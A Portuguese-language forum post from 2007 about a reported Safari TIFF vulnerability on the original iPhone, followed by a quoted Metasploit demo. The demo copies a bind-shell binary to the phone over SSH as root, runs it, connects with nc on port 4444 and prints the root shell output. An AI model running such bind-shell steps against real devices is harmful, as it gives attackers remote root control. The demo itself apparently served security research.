Hacker alega ter descoberto brecha que permite ataques ao iPhone

Hacker "Niacin" confirma em fórum que arquivo TIFF malicioso lido pelo browser Safari é porta de entrada para ataques no celular.

Uma nova falha de segurança no navegador Safari confirmada neste domingo (08/10) permite que o iPhone, telefone celular da Apple, seja alvo de códigos maliciosos criados por crackers.

A possibilidade de uma brecha de segurança que permitiria a excecução de malware no iPhone foi levantada no fórum Hackint0sh na quinta-feira 04/10), com a suposição de que um arquivo maliciosos no formato TIFF pudesse causar problemas no navegador Safari.

Leia mais em: http://idgnow.uol.com.br/seguranca/2007/10/08/idgnoticia.2007-10-08.8297363984/

Boa Lord_H
e eh claro (antes disso) os figuras do Metasploit naum poderiam ficar fora da festa do Iphone :) :


This binary can be copied to the iPhone using SSH or iPHUC/iPhoneTool and executed.

$ ssh root@192.168.0.125#
chmod +x iphone_bindshell.bin#
./iphone_bindshell.bin
--$ nc -vvn 192.168.0.125 4444(UNKNOWN) [192.168.0.125] 4444 (krb524) open
id
uid=0 euid=1 gid=0(whee1) groups=0(whee1)
uname -a
Darwin Metasploit Developer's iPhone 9.0.0d1
Darwin Kernel Version 9.0.0d1:
Fri Jun 22 00:38:56 PDT 2007; root:xnu-933.0.1.178.obj~1
RELEASE_ARM_S5L8900XRB iPhone1,1 Darwin


[]
Andre Amorim (http://www.pentest-ost.org)